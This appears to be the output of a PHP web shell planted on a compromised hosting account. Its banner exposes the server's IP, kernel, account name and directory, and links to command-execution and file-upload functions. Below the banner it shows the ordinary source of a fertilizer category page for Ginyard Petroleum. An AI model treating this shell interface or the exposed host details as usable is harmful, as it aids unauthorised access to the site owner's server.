Server IP : 103.53.40.154 / Your IP : 3.145.103.169 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ginyardpetroleum.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html dir="ltr" lang="en"> <head> <!-- Meta Tags --> <meta name="viewport" content="width=device-width,initial-scale=1.0" /> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Industrypress - Factory & Industrial Business Template" /> <meta name="keywords" content="building,business,construction,cleaning,transport,workshop" /> <meta name="author" content="ThemeMascot" /> <!-- Page Title --> <title>Ginyard Petroleum Pvt. Ltd.</title> <?php include 'top-link.php';?> </head> <body class=""> <div id="wrapper" class="clearfix"> <!-- preloader --> <div id="preloader"> <div id="spinner"> <img class="ml-5" src="<?php echo $wspath?>images/preloaders/3.gif" alt=""> </div> <div id="disable-preloader" class="btn btn-default btn-sm">Disable Preloader</div> </div> <?php include 'header.php';?> <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="<?php echo $wspath?>images/sl3.jpg"> <div class="container pt-100 pb-50"> <!-- Section Content --> <div class="section-content pt-100"> <div class="row"> <div class="col-md-12"> <h3 class="title text-white">FERTILIZER</h3> <ul class="breadcrumb white"> <li><a href="<?php echo $wspath?>">Home</a></li> <li class="active">FERTILIZER</li> </ul> </div> </div> </div> </div> </section> <section class="category"> <div class="container"> <div class="section-content"> <div class="row"> <!--......card-start----> <?php $sql = "SELECT * FROM `tbl_services` WHERE m_id='FERTILIZER'"; $run = mysqli_query($db,$sql) or die("Query Not run"); while($data = mysqli_fetch_assoc($run)){ ?> <div class="col-md-3"> <a href="<?php echo $wspath?>services<?php echo $data['slug_url']?>.php"> <div class="cat-box"> <div class="image"> <img class="img-fluid" src="<?php echo $wspath?>admin/images/property-image/<?php echo $data['image']?>" alt="<?php echo $data['name']?>"> </div> <div class="detail"> <h4 class="text-center"><?php echo $data['name']?></h4> </div> </div> </a> </div> <?php } ?> <!--.......card-end.....--> <!--......card-start----> <!--<div class="col-md-3">--> <!-- <a href="services.php">--> <!-- <div class="cat-box">--> <!-- <div class="image">--> <!-- <img class="img-fluid" src="https://img.freepik.com/free-photo/oil-pollution-water-created-with-generative-ai-technology_185193-110077.jpg?w=1060&t=st=1691754332~exp=1691754932~hmac=f40eaa89472b1866885c1349dc275e27b7044ef9ef6f40a6adfe0210866d34b8" alt="img">--> <!-- </div>--> <!-- <div class="detail">--> <!-- <h4 class="text-center">Cruid Oil</h4>--> <!-- </div>--> <!-- </div>--> <!-- </a> --> <!--</div>--> <!--.......card-end.....--> </div> </div> </div> </section> <?php include 'footer.php';?> </div> </body> </html>